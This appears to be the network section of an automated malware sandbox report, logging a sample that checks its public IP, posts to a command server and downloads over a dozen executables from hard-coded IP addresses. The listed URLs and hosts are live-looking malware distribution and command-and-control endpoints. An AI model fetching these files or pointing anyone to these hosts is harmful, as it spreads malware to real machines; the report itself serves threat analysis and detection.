Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 104.192.140.26 | Active | Moloch |
| 104.237.62.213 | Active | Moloch |
| 104.26.4.15 | Active | Moloch |
| 104.26.9.59 | Active | Moloch |
| 108.61.198.52 | Active | Moloch |
| 147.45.44.104 | Active | Moloch |
| 147.45.45.69 | Active | Moloch |
| 164.124.101.2 | Active | Moloch |
| 176.111.174.109 | Active | Moloch |
| 176.113.115.33 | Active | Moloch |
| 185.215.113.37 | Active | Moloch |
| 194.116.215.195 | Active | Moloch |
| 34.117.59.81 | Active | Moloch |
| 45.91.200.135 | Active | Moloch |
| 80.66.75.114 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| bitbucket.org | 104.192.140.25 | |
| api64.ipify.org | 104.237.62.213 | |
| ipinfo.io | 34.117.59.81 | |
| api.myip.com | 104.26.9.59 | |
| db-ip.com | 104.26.5.15 | |
| 240922164748184.tyr.zont16.com | 179.43.188.227 |
- TCP Requests
-
-
192.168.56.103:49183 104.192.140.26:80bitbucket.org
-
192.168.56.103:49184 104.192.140.26:80bitbucket.org
-
192.168.56.103:49185 104.192.140.26:80bitbucket.org
-
192.168.56.103:49187 104.192.140.26:443bitbucket.org
-
192.168.56.103:49189 104.192.140.26:443bitbucket.org
-
192.168.56.103:49190 104.192.140.26:443bitbucket.org
-
192.168.56.103:49167 104.237.62.213:443api64.ipify.org
-
192.168.56.103:49168 104.237.62.213:443api64.ipify.org
-
192.168.56.103:49171 104.26.4.15:443db-ip.com
-
192.168.56.103:49172 104.26.9.59:443api.myip.com
-
192.168.56.103:49188 108.61.198.52:80240922164748184.tyr.zont16.com
-
192.168.56.103:49178 147.45.44.104:80
-
192.168.56.103:49180 147.45.44.104:80
-
192.168.56.103:49176 147.45.45.69:80
-
192.168.56.103:49177 147.45.45.69:80
-
192.168.56.103:49181 176.111.174.109:80
-
192.168.56.103:49179 176.113.115.33:80
-
192.168.56.103:49182 185.215.113.37:80
-
192.168.56.103:49174 194.116.215.195:80
-
192.168.56.103:49169 34.117.59.81:443ipinfo.io
-
192.168.56.103:49170 34.117.59.81:443ipinfo.io
-
192.168.56.103:49166 45.91.200.135:80
-
192.168.56.103:49173 45.91.200.135:80
-
192.168.56.103:49175 80.66.75.114:80
-
- UDP Requests
-
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:56613 164.124.101.2:53
-
192.168.56.103:62576 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:49154 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.103:62576
-
GET
200
https://db-ip.com/demo/home.php?s=
REQUEST
RESPONSE
BODY
GET /demo/home.php?s= HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: db-ip.com
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:36 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
x-iplb-request-id: AC453FA3:8F6A_93878F2E:0050_66F37068_27E3B16C:7B63
x-iplb-instance: 59128
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H2XZBr5DXf8Eg9ub%2BtlkI3012iPpuyECUCj9cWqmuogY9wkzFKPWPHU3goeNpzVmeWyExeCw7ZXm%2FmSO%2Bt6lmwEAzH%2FaYuLcmUVkHRLQI4UnHVEGMSoTtwKUGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c87762b58f0962b-KIX
GET
200
https://api.myip.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: api.myip.com
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iyU7hXw1zwUK9paJEEYI0iUBbkExMOqZiBOtf47uN8UyfRCWsS4CAoSYZgYMA%2BmeQrlt9SFs7%2BHOHqAuBYNrYh09CIyokHqlpny98KRgxgs1ty6Tj0CE%2BQ9Bv%2FWe5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c877644e8ad9659-KIX
GET
200
http://45.91.200.135/api/wp-ping.php
REQUEST
RESPONSE
BODY
GET /api/wp-ping.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 45.91.200.135
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:35 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 6
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST
200
http://45.91.200.135/api/wp-admin.php
REQUEST
RESPONSE
BODY
POST /api/wp-admin.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Length: 133
Host: 45.91.200.135
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:50 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 108
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST
200
http://45.91.200.135/api/wp-admin.php
REQUEST
RESPONSE
BODY
POST /api/wp-admin.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Length: 133
Host: 45.91.200.135
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:50 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 2456
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
HEAD
200
http://194.116.215.195/File.exe
REQUEST
RESPONSE
BODY
HEAD /File.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 194.116.215.195
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 374272
Last-Modified: Tue, 24 Sep 2024 18:04:20 GMT
Connection: keep-alive
ETag: "66f2ff24-5b600"
Accept-Ranges: bytes
HEAD
200
http://80.66.75.114/dl?name=inte
REQUEST
RESPONSE
BODY
HEAD /dl?name=inte HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 80.66.75.114
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:52 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="inte.exe";
Content-Type: application/octet-stream
HEAD
200
http://147.45.45.69/sdsdhggf.exe
REQUEST
RESPONSE
BODY
HEAD /sdsdhggf.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.45.69
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 334376
Last-Modified: Wed, 25 Sep 2024 00:19:12 GMT
Connection: keep-alive
ETag: "66f35700-51a28"
Accept-Ranges: bytes
HEAD
200
http://147.45.45.69/vdcsb.exe
REQUEST
RESPONSE
BODY
HEAD /vdcsb.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.45.69
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 413224
Last-Modified: Wed, 25 Sep 2024 00:19:10 GMT
Connection: keep-alive
ETag: "66f356fe-64e28"
Accept-Ranges: bytes
HEAD
200
http://147.45.44.104/revada/66f3128883969_crypted.exe#1
REQUEST
RESPONSE
BODY
HEAD /revada/66f3128883969_crypted.exe#1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 324608
Last-Modified: Tue, 24 Sep 2024 19:27:04 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f31288-4f400"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
HEAD
200
http://176.113.115.33/thebig/noode.exe
REQUEST
RESPONSE
BODY
HEAD /thebig/noode.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 176.113.115.33
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 3108923
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Content-Description: File Transfer
Content-Disposition: attachment; filename=noode.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public
HEAD
200
http://147.45.44.104/yuop/66f32080436ad_deepweb.exe#deep
REQUEST
RESPONSE
BODY
HEAD /yuop/66f32080436ad_deepweb.exe#deep HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 97792
Last-Modified: Tue, 24 Sep 2024 20:26:40 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f32080-17e00"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
HEAD
200
http://176.111.174.109/kurwa
REQUEST
RESPONSE
BODY
HEAD /kurwa HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 176.111.174.109
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Wed, 25 Sep 2024 02:07:50 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
Content-Disposition: attachment; filename="IJXMh9myGw.exe"
Server-Timing: total;dur=18.9;desc="Total Response Time"
content-transfer-encoding: Binary
HEAD
200
http://185.215.113.37/vera/nate.exe
REQUEST
RESPONSE
BODY
HEAD /vera/nate.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 185.215.113.37
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:52 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 25 Sep 2024 02:06:32 GMT
ETag: "5d800-622e812287929"
Accept-Ranges: bytes
Content-Length: 382976
Content-Type: application/x-msdos-program
GET
200
http://176.111.174.109/kurwa
REQUEST
RESPONSE
BODY
GET /kurwa HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 176.111.174.109
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Wed, 25 Sep 2024 02:07:51 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Content-Disposition: attachment; filename="1VheuyPhaA.exe"
Server-Timing: total;dur=1.9;desc="Total Response Time"
content-transfer-encoding: Binary
GET
200
http://176.113.115.33/thebig/noode.exe
REQUEST
RESPONSE
BODY
GET /thebig/noode.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 176.113.115.33
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 3108923
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Content-Description: File Transfer
Content-Disposition: attachment; filename=noode.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public
GET
200
http://185.215.113.37/vera/nate.exe
REQUEST
RESPONSE
BODY
GET /vera/nate.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 185.215.113.37
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:52 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 25 Sep 2024 02:06:32 GMT
ETag: "5d800-622e812287929"
Accept-Ranges: bytes
Content-Length: 382976
Content-Type: application/x-msdos-program
GET
200
http://147.45.45.69/sdsdhggf.exe
REQUEST
RESPONSE
BODY
GET /sdsdhggf.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.45.69
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 334376
Last-Modified: Wed, 25 Sep 2024 00:19:12 GMT
Connection: keep-alive
ETag: "66f35700-51a28"
Accept-Ranges: bytes
GET
200
http://147.45.45.69/vdcsb.exe
REQUEST
RESPONSE
BODY
GET /vdcsb.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.45.69
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 413224
Last-Modified: Wed, 25 Sep 2024 00:19:10 GMT
Connection: keep-alive
ETag: "66f356fe-64e28"
Accept-Ranges: bytes
HEAD
200
http://147.45.44.104/malesa/66f31d151f82e_lyla34.exe
REQUEST
RESPONSE
BODY
HEAD /malesa/66f31d151f82e_lyla34.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 253952
Last-Modified: Tue, 24 Sep 2024 20:12:05 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f31d15-3e000"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
HEAD
200
http://147.45.44.104/lopsa/66f18e5598f87_kaloa.exe
REQUEST
RESPONSE
BODY
HEAD /lopsa/66f18e5598f87_kaloa.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 3229696
Last-Modified: Mon, 23 Sep 2024 15:50:45 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f18e55-314800"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET
200
http://194.116.215.195/File.exe
REQUEST
RESPONSE
BODY
GET /File.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 194.116.215.195
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 374272
Last-Modified: Tue, 24 Sep 2024 18:04:20 GMT
Connection: keep-alive
ETag: "66f2ff24-5b600"
Accept-Ranges: bytes
GET
200
http://80.66.75.114/dl?name=inte
REQUEST
RESPONSE
BODY
GET /dl?name=inte HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 80.66.75.114
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:52 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="inte.exe";
Content-Length: 325120
Content-Type: application/octet-stream
HEAD
200
http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exe
REQUEST
RESPONSE
BODY
HEAD /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 11496960
Last-Modified: Wed, 18 Sep 2024 05:25:37 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66ea6451-af6e00"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET
200
http://147.45.44.104/yuop/66f32080436ad_deepweb.exe#deep
REQUEST
RESPONSE
BODY
GET /yuop/66f32080436ad_deepweb.exe#deep HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 97792
Last-Modified: Tue, 24 Sep 2024 20:26:40 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f32080-17e00"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
HEAD
404
http://240922164748184.tyr.zont16.com/f/fikbam0922184.exe
REQUEST
RESPONSE
BODY
HEAD /f/fikbam0922184.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 240922164748184.tyr.zont16.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Caddy
Status: 404 Not Found
Date: Wed, 25 Sep 2024 02:07:53 GMT
GET
200
http://147.45.44.104/revada/66f3128883969_crypted.exe#1
REQUEST
RESPONSE
BODY
GET /revada/66f3128883969_crypted.exe#1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:53 GMT
Content-Type: application/octet-stream
Content-Length: 324608
Last-Modified: Tue, 24 Sep 2024 19:27:04 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f31288-4f400"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET
404
http://240922164748184.tyr.zont16.com/f/fikbam0922184.exe
REQUEST
RESPONSE
BODY
GET /f/fikbam0922184.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 240922164748184.tyr.zont16.com
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Caddy
Status: 404 Not Found
Date: Wed, 25 Sep 2024 02:07:53 GMT
Content-Length: 17
GET
200
http://147.45.44.104/malesa/66f31d151f82e_lyla34.exe
REQUEST
RESPONSE
BODY
GET /malesa/66f31d151f82e_lyla34.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:53 GMT
Content-Type: application/octet-stream
Content-Length: 253952
Last-Modified: Tue, 24 Sep 2024 20:12:05 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f31d15-3e000"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
HEAD
200
http://147.45.45.69/vdcsnjdh15.exe
REQUEST
RESPONSE
BODY
HEAD /vdcsnjdh15.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.45.69
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:54 GMT
Content-Type: application/octet-stream
Content-Length: 413224
Last-Modified: Wed, 25 Sep 2024 00:19:11 GMT
Connection: keep-alive
ETag: "66f356ff-64e28"
Accept-Ranges: bytes
GET
200
http://147.45.45.69/vdcsnjdh15.exe
REQUEST
RESPONSE
BODY
GET /vdcsnjdh15.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.45.69
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:54 GMT
Content-Type: application/octet-stream
Content-Length: 413224
Last-Modified: Wed, 25 Sep 2024 00:19:11 GMT
Connection: keep-alive
ETag: "66f356ff-64e28"
Accept-Ranges: bytes
GET
200
http://147.45.44.104/lopsa/66f18e5598f87_kaloa.exe
REQUEST
RESPONSE
BODY
GET /lopsa/66f18e5598f87_kaloa.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:54 GMT
Content-Type: application/octet-stream
Content-Length: 3229696
Last-Modified: Mon, 23 Sep 2024 15:50:45 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f18e55-314800"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.103:49171 104.26.4.15:443 |
C=US, O=Google Trust Services, CN=WR1 | CN=db-ip.com | e0:87:2e:81:a3:0e:fe:55:82:41:57:b8:ff:b2:84:42:af:47:01:7c |
|
TLSv1 192.168.56.103:49172 104.26.9.59:443 |
C=US, O=Google Trust Services, CN=WR1 | CN=myip.com | b3:80:cf:15:df:f5:53:6f:d4:e4:88:68:de:87:c0:e1:f8:3b:2c:02 |
Snort Alerts
No Snort Alerts